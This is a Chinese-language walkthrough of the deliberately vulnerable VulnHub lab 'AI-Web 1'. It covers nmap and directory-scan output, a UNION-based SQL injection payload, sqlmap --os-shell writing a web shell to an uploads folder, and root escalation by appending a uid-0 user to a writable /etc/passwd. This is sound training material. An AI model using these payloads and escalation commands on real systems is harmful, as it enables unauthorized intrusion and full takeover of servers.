机器信息
vulnhub 靶场 AI-Web 1
操作系统
linux
详细介绍
特训结业训练的 一个简单靶场,主要还是web的信息泄露和sql注入
sql注入碰巧又符合os-shell 可以拿到shell 之后就是一个简单的 passwd提权
0x00信息收集 0x01循例端口扫描 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 Starting Nmap 7.93 ( https://nmap.org ) at 2024-07-06 11:24 CST Nmap scan report for 192.168.49.128 Host is up (0.00021s latency). Not shown: 999 closed tcp ports (reset) PORT STATE SERVICE 80/tcp open http MAC Address: 00:0C:29:23:04:32 (VMware) # 详细信息: PORT STATE SERVICE VERSION 80/tcp open http Apache httpd |_http-title: AI Web 1.0 |_http-server-header: Apache | http-robots.txt: 2 disallowed entries |_/m3diNf0/ /se3reTdir777/uploads/ MAC Address: 00:0C:29:23:04:32 (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop
资产整理
系统:Linux 服务器:Apache(版本未知) 信息泄露: robots.txt 路径泄露: /m3diNf0/ /se3reTdir777/uploads/
可以看出只有web资产
0x02扫描目录 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 + http://192.168.49.128/index.html (CODE:200|SIZE:141) + http://192.168.49.128/robots.txt (CODE:200|SIZE:82) + http://192.168.49.128/server-status (CODE:403|SIZE:222) [11:48:08] 403 - 220B - /.ht_wsr.txt [11:48:09] 403 - 223B - /.htaccess.orig [11:48:09] 403 - 225B - /.htaccess.sample [11:48:09] 403 - 223B - /.htaccess.bak1 [11:48:09] 403 - 223B - /.htaccess.save [11:48:09] 403 - 223B - /.htaccess_orig [11:48:09] 403 - 221B - /.htaccess_sc [11:48:09] 403 - 221B - /.htaccessBAK [11:48:09] 403 - 221B - /.htaccessOLD [11:48:09] 403 - 222B - /.htaccessOLD2 [11:48:09] 403 - 213B - /.htm [11:48:09] 403 - 214B - /.html [11:48:09] 403 - 223B - /.htpasswd_test [11:48:09] 403 - 220B - /.httr-oauth [11:48:09] 403 - 219B - /.htpasswds [11:48:10] 403 - 213B - /.php [11:48:10] 403 - 224B - /.htaccess_extra err[11:49:00] 200 - 80B - /robots.txt [11:49:01] 403 - 222B - /server-status [11:49:01] 403 - 223B - /server-status/
可以看到 robots.txt 除此之外没有什么别的东西了
403 了 这个url 因此http://192.168.49.128/m3diNf0/ 继续递归扫描目录
1 [14:57:12] 200 - 22KB - /m3diNf0/info.php
一个信息泄露 再次挨个扫目录不能说毫无收获 只能说一无所获
0x10 web 信息泄露 1 2 3 4 http://192.168.49.128/m3diNf0/info.php 没有猜错OS |7.2.19-0ubuntu0.18.04.2|
SQL注入 1 http://192.168.49.128/se3reTdir777
联合查询 注入 而且感觉是一个回显注入
**poc
1 1 ' union select version(),2,3
**First Name: aiweb1user@localhost Last Name: 5.7.42-0ubuntu0.18.04.1
0x20 Get_shell
目前就找到一个sql注入 根据sql注入做文章 先停止信息收集 最快可以getshell的只能是–os-shell secure_file_priv 这个没在phpinfo()中查到 但是可以知道用户
sqlmap 使用
高权限:
怎么说呢 我现在觉得只能去盲猜测 secure…. 没被设置 但是我们还要找到一个 当前用户有权限的一些路径 才能上传 getshell 试了常规的 /var/www/html 但是不行后来在
info.php 找到了根目录
/home/www/html/web1x443290o2sdf92213
但是也不行 只能试试uploads
|/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/|
成功
0x30 Post
第一步肯定是 linpeas 先上去扫一遍 怎么说呢….好像傻了一样 找了多攻击向量但是都用不成 后来才发现 passwd 是我自己的 文件 我可以执行 ….. 写操作果然还是不能把东西想的太高端 其实说实话还是要看到一个不能属主 属组 其他 就不看文件主人是谁
1 2 3 4 5 6 openssl passwd -1 -salt 123 123 echo "tom:$1$123$nE5gIYTYiF1PIXVOFjQaW/:0:0:root:/root:/usr/bin/zsh" > > /etc/passwd su tom
拿到权限 ok 下机 —-